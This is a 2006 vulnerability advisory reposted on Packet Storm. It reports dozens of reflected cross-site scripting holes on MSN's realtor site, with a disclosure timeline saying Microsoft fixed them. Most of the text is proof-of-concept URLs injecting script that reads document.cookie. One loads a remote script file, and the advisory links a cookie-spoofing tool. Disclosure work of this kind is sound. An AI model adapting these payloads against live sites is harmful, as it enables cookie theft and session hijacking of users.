Hotmail/MSN suffers from a slew of cross site scripting vulnerabilities.
fdce82a30bb280fb585e168012d410d3eaa28083187e2b58bd2e9c1e24b1822cTitle: Hotmail/MSN Multiple cross site scripting ( XSS )
Author: Securma Massine
MorX Security Research Team
http://www.morx.org
Original Advisory/Xploit : http://www.morx.org/msnxss.txt
Vulnerability : Multiple cross site scripting ( XSS )
Severity: Medium/High
Description : msn.com is suffers from multiple xss which could allow an attacker to hijack web sessions .This vulnerability can be used to gather the victim's cookies,steal his session,..
Proof of Concept/Example of the issue: a great number of XSS (hundred )in http://realtor.realestate.msn.com
they is only some examples :
http://realtor.realestate.msn.com/Default.asp?poe="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss=loc&ad=http%3A%2F%2Frealtor.realestate.msn.com%2FFindNeig%2Fdefault.asp%3Flnksrc%3DREALR2LF2C0058%26poe%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://realtor.realestate.msn.com/SiteMap.asp?lnksrc=RDC-NAV-0005&poe="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/RealtyTimes/marketconditions.asp?link=http://yoursite/xss.js?open&pID=r.com2
http://realtor.realestate.msn.com/PersPlanOut/ArticleEmail.asp?anm=REALTOR%2Ecom%3A+Real+Estate+101&alnk=http%3A%2F%2Frealtor%2Erealestate%2Emsn%2Ecom%2Fbasics%2Findex%2Easp%3Flnksrc%3DREALR2LF2C0039%26poe%3D%22%3E%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C%2Fscript%3E
http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst"><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/Basics/AllAbout/TypesStyles/Index.asp?poe="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/FindHome/NearbySearch.asp?frm=bymlsid"><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms=Bad%20Credit&lnksrc=OVER_SRCH_RDC1"><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/Gateways/MSN/Default.asp?ct="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss"><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst""&ct="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/FindHome/InterimSearch.asp?typ=1%2C+2%2C+3%2C+4%2C+5%2C+6%2C+7&mxprice=99999999&mlsttl=&mnbath=0&frm=bymap&pgnum=1&st=CA&mls=xmls&mnbed=0&js=on&ct=Orange&zp=&mnprice=0&areaid="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/california/nborange.asp?"><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fah&miss=loc&typ="><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/FindHome/default.asp?mode=MLS&"><script>alert(document.cookie);</script>
http://realtor.realestate.msn.com/FindHome/default.asp?mode=City&"><script>alert(document.cookie);</script>&poe=realtor
and many many other.....
Screen captures: http://www.morx.org/msnx.jpg
workaround: The Hotmail exploit can easily be executed via , e-mails , links ,messenger , attachement.
you can use this tool to open the browser with fake hotmail's cookie(IE):
http://www.morx.org/hotcookie.exe
Disclosure timeline:
07/30/2006 Issue disclosed to Microsoft
07/30/2006 Response received from secure@microsoft.com
09/05/2006 fix some xss
09/07/2006 sending to microsoft new list of msn xss
12/09/2006 announce the fix of all the xss in 24h
13/09/2006 fixed
14/09/2006 public advisory
Greets: Attitude and all morx team
Disclaimer:
The author do not have any responsibility for any malicious use of this advisory or proof of concept code. The code and the information provided here are for educational purposes only.
comments or additional questions feel free to email me at securma_at_morx_org.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed